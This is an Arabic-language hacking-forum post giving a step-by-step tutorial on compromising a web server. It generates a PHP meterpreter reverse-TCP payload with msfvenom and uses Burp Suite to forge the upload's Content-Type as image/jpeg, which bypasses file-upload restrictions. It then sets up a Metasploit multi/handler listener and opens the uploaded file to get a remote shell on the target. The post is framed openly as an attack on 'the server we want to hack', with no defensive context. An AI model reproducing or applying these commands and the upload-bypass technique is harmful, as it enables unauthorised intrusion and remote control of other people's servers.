عرض مشاركة واحدة
قديم 09-26-2016, 03:36 AM   رقم المشاركة : 1 (permalink)
معلومات العضو
T!F!Nar
 
الصورة الرمزية T!F!Nar
 

 

 
إحصائية العضو








T!F!Nar غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
T!F!Nar is on a distinguished road

تحدي انشاء Payload كليـن مع الدمج ببرنامج Shellter


السلام عليكم
شرح اليوم سيكون ممتع لاني حملت الصور
ان شاء الله طريقة حصرية في المحتوى العربية لتجاوز مشاكل file upload و القيود المفروضة عند محاولة رفع شيل او ملف ملغم
على السيرفر المراد اختراقه لنرى معا كيف.

المرحلة 1 : انشاء سيرفر اختراق Generating a Payload

نقوم بتجاوز قيود رفع الملفات لنقوم برفع أي ملف نريد على السيرفر أو الموقع المراد اختراقه لدا
كالعادة في شروحاتي سأقوم بانشاء طورجان php للتحكم في السيرفر
نقوم بانشاءه عبر الأمر التالي:
كود:
msfvenom -p php/meterpreter/reverse_tcp > payload.php

نعطي خاصية -p لتعريف البايلوياد المرغوب فيه


المرحلة 2 : تشغيل burp suite و اعداد البروكسي

برنامج burp suite يتوفر على الكثير من المزايا، في هدا الشرح سنستعمل خاصية البروكسي
هدا يسمح لنا من معرفة و استخراج المعلومات التي نرسلها للسيرفر و التعديل على بعض القيم المتعلقة بها.
بمجرد تشغيل burp suite سترى النافذة التالية

ملاحظة: أنا قمت بتعطيل خاصية intercept قم بدلك انت أيضا.

الأن و قد قمنا بتشغيل البرنامج علينا اعداد المتصفح الخاص بنا لشيتغل على بروكسي البرنامج
أظن الكل يعرف أين يضع اعدادات البروكسي في المتصفح الخاص به
في حالتي فايرفوكس ادهب الى اعدادات -- اعدادت متقدمة --- اعدادت الانترنت بالاجنبية:
و نجله على localhost او 127.0.0.1 و البورت 8080
الكتالي


و كان كل شيء على ما يرام فالبرامج مستعد للعمل نمر

المرحلة 3 : تجاوز القيود

الأن بعد أن تم اعداد كل شي سأحاول رفع السيرفر بدون بروكسي لارى النتيجة

محاولة الرفع العادية تعود بالفشل

نرى أن القيود تعمل بشكل جيد و لم يتم رفع البايلوياد
ندهب لبرنامجنا و نجعل الخاصية كما في الصورة التالية :

لنتمكن من قراءة البيانات
الان نقوم باعادة محاولة رفع الملف لفك القيود و نرى الناتج في البرنامج كالتالي مثلا:

في الناتج نجد content type أي نوع المحتوى و هو في هدا الحالة php كما ترون .
كل ما سيكون علي فعله هو تغيير قيمة Content-Type الى "image/jpeg" لنوهم السيرفر
ان الملف عبارة عن صورة

جيد ؟ كل ما عليك فعله الضغط على زر الارسال forward في اعلى و اعادة تعطيل خاصية intercept مجددا . و الأن بعد أن قمنا بتغيير قيمة نوع الملف سيكون لنا الرفع بكل حرية

تم رفع الملف و تجاوز القيد


المرحلة الأخيرة: التصنت و الأختراق

بما أننا سننتظر اتصال عكسي نقوم بالتنصت ببرنامج الميتاسبوليت على البايلوياد
نفتح الميتا
كود:
msfconsole
نكتب الأمر
كود:
use multi/handler
كود:
set  Payload  php/meterpreter/reverse_tcp
كود:
set lhost 10.0.0.18
كود:
set lport 4444

قمنا بتشغيل متصنت reverse TCP meterpreter Payload و ووضعت lhost لعنوان الايبي الخاص بي، ربما لاحظتم انني استعملت بايلوياد مخالف للدي كونت به الملف الملغوم في الأول
دلك لاننا في البدء قمنا تكوين بايلوياد stager أي أنه يقوم انشاء الاتصال و الثاني للتشغيل يسمح لنا بالتحكم
الأن كل ما علينا عمله بدء التصنت لتشغيل البايلويد.
كود:
exploit

و الان البرنامج ينتظر اتصال على البورت 4444 و هو البورت الدي يجب استخدامه
الأن تشغيل الملف الدي تم رفعه
كل ما عليك فعله الدخول بالمتصفح الى مسار الملف

بمجرد فتح الرابط ستحصل على التالي

مبروك الجلسة و الاختراق
أي استفسار تفضلوا



hkahx Payload ;gdJk lu hg]l[ ffvkhl[ Shellter burp suite hojvhr

التوقيع

Love
Peace

Weed

 


التعديل الأخير تم بواسطة mimo-dz ; 10-13-2016 الساعة 10:19 PM.

   

رد مع اقتباس